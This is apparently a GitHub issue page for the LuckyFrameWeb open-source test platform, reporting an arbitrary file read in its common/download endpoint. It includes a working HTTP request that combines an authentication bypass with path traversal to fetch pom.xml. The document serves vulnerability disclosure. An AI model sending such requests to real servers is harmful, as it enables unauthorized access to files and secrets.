seagull1985 / LuckyFrameWeb

LuckyFrame测试平台是一款免费开源的测试平台，最大的特点是全纬度覆盖了接口自动化、WEB UI自动化、APP自动化，并且支持分布式测试，测试关键字驱动也很大程度上解决了测试同学代码基础弱的问题。同时也集成了质量管理相关的一些功能，解决QA的日常工作中，项目过程数据的收集问题，并能展示一些简单质量报表。更多功能可以关注公众号或是访问官网了解哦。

http://www.luckyframe.cn

Arbitrary file reading vulnerability

S2eTo opened this issue 2 years ago · comments

J0hNs0N commented 2 years ago

API: common/download, parameter: fileName is not verified, resulting in arbitrary file download

com.luckyframe.project.common.CommonController#fileDownload

Use authentication bypass vulnerability to read pom.xml file

GET /css/..;/common/download?fileName=../../pom.xml HTTP/1.1